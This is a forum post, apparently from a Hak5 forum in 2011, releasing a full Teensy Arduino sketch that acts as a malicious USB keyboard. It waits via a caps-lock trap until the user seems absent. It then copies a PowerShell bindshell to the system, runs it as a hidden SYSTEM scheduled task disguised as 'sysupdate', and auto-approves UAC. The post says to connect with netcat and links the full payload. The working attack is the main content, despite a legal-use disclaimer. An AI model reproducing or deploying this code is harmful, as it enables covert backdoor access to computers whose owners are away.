[Version 1] Teensy Onboard Windows Bindshell

[leg3nd]

Windows System Onboard Bindshell w/ Caps Lock Trap

Disclaimer: This script is intended for LEGAL purposes ONLY. By downloading the following material you agree that the intended use of the previously mentioned is for LEGAL and NON-MALICIOUS purposes ONLY. This means while gaining client side exploits, you have the correct documentation and permissions to do so in accordance with all US and International laws and regulations. Nor I nor any associates at Hak5 condone misuse of this script or its features.

Download Teensy Sketch: http://info-s3curity.com/teensy/OnboardShell.tar.gz

What is this?

This is an example of an implementation with teensy with ideas given by ReL1k and irongeek which uses the teensy's onboard storage to store a very small and undetectable backdoor bindshell written purely in powershell. The code also uses some basic iterations and use of caps lock to check for user detection, it will turn on caps lock before every user detection check and if it stays on for 10 iterations (with delay intervals between checks), then it will assume the user is not at the computer considering most people do not type in all caps and tend to turn it off.

How does it work?

• The caps lock check utilizes the usb_private library which contains a ledkeys() function, this function returns an integer based on the lock keys currently found turned on. By creating a statement which contains all possible combinations which include the interger for caps lock, which is 2, we can assume the light will be on. The following snipplet accomplishes that with ease..
  

  if (ledkeys() == 2 || ledkeys() == 3 || ledkeys() == 6 || ledkeys() == 7)

  
  

• Furthermore, by creating a couple nested statements with iterations we can use this check a little more throughly, by checking multiple times with time between the checks we can insure that nobody is using the keyboard to type unless they love screaming at people with caps lock. :D
  
• Now that we have established a basic way to determine if there is user activity on the computer, which is adjustable depending how sensitive you need it to be, we will create our attack vector.. Lets get a little evil.
  
• First we set the teensy in arduino to "Keyboard + Disk(Internal)" mode, this will allow us to use the very small amount of flash memory to store our onboard bindshell which will be copied over to compromise the system. This bindshell is a very simple powershell script which can be run without any AV issues through Windows powershell, we will also utilize Windows task scheduler to both hide the window and run the script with system privileges. This can also be setup by editing the code to run at a given time, but I just have it setup to run the one time when the user is not detected.
  
• Once the victim is compromised, we simply netcat into the bindshell on port 12345 and do whatever needs to get done. EG, nc 192.168.1.100 12345

Requirements

• A stock teensy development board and Arduino development environment, no soldering or modifications required.
  
• Windows 7 victim and user account must have Administrator privileges

Note: Download the full sketch form link above for use, also contains bindshell and setup for internal disk usage.

The code...

/* leg3nd's Windows powershell bindshell w/ system
   Based on PhukdLib by irongeek, powershell bindshell by Rel1k
   Detects user to implement attack based on capslock state
   -MUST BE SET TO KEYBOARD + DISK(INTERNAL) TO WORK
*/

#include "usb_private.h"
#define send_enter() send_keys(KEY_ENTER, 0);
#define send_caps() send_keys(KEY_CAPS_LOCK, 0);
#define send_windows() send_keys(0, 128);
#define send_alt_y() send_keys(KEY_Y, MODIFIERKEY_ALT);
#define send_windows_r() send_keys(KEY_R, MODIFIERKEY_GUI);
int attacked = 0;

void setup(){
  pinMode(11, OUTPUT);
  delay(5000);
  startDelay(30, 25); //startup blink
}

void loop(){
  delay(9000); // Time between attack checks
  if (!IsCapsOn()){send_caps();} //Turn on caps lock for trap
  int userState = 0;
  for (int m=9; m>=0; m--) { //Number of caps lock checks before attack, default = 10 checks
    delay(3000); //Delay between caps lock check iterations
    if (IsCapsOn()){
      delay(3000); //Delay after caps lock is found to be on
    } else {
      userState = userState + 1;
    }
  }
  if (userState>0){
    delay(300000); //Time to wait if user is detected, 300K = 5min
  } else {
    AdminCmd("cmd /c for /F %i in ('WMIC logicaldisk where \"DriveType=2\" list brief ^| find \"Windows\"') do copy /Y %i\\bind.ps1 %APPDATA%\\bind.ps1 && powershell -Command Set-ExecutionPolicy RemoteSigned");
    delay(200);
    AdminCmd("schtasks /create /tn sysupdate /tr \"powershell -File %APPDATA%\\bind.ps1 -WindowStyle Hidden\" /sc once /ru system /st 23:59:59");
    delay(200);
    AdminCmd("schtasks /run /tn sysupdate");
    delay(999999999); //Just chill, payload already executed (max 11.5 days)
  }
}

//Execute command as administrator
void AdminCmd(char *SomeCommand) {
  send_windows();
  delay(1500); //Delay for start menu to come up
  Keyboard.print(SomeCommand);
  Keyboard.set_modifier(MODIFIERKEY_CTRL);
  Keyboard.send_now();
  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT);
  Keyboard.send_now();
  send_enter();
  delay(1000); //Delay for UAC prompt
  send_alt_y();
}

//LED key checking for caps lock
int ledkeys(void){
  return int(keyboard_leds);
}
//Return the state of caps lock, regardless of other lights.
boolean IsCapsOn(){
  if (ledkeys() == 2 || ledkeys() == 3 || ledkeys() == 6 || ledkeys() == 7){
    return true;
  } else {
    return false;
  }
}

//Key & Utility functions
void startDelay(int count, int dlay){ //debug testing light
 for (int i=0; i<count; i++){
   digitalWrite(11,HIGH);
   delay(dlay);
   digitalWrite(11,LOW);
   delay(100);
 }
}
void release_keys(){
  Keyboard.set_key1(0);
  Keyboard.set_modifier(0);
  Keyboard.send_now();
  delay(100);
}
void send_keys(int key, int modifier){
  if(modifier)
     Keyboard.set_modifier(modifier);
  Keyboard.set_key1(key);
  Keyboard.send_now();
  delay(100);
  release_keys();
}

Enjoy responsibly! B)

Edited July 5, 2011 by leg3nd

[UnDeFiNeD]

Awesome! Thanks for the release. I was about to start looking into more complicated stuff, this helps :)

[leg3nd]

Glad it helps, I'll consider releasing some other sketches when I get some time off summer school. But this same template can be used for the caps lock traps with many different attack vectors, it appears to work very well in the lab and is probably the closest thing to user detection without using a photoresistor or other additional hardware.

Any other ideas throw them my way. Thanks. :)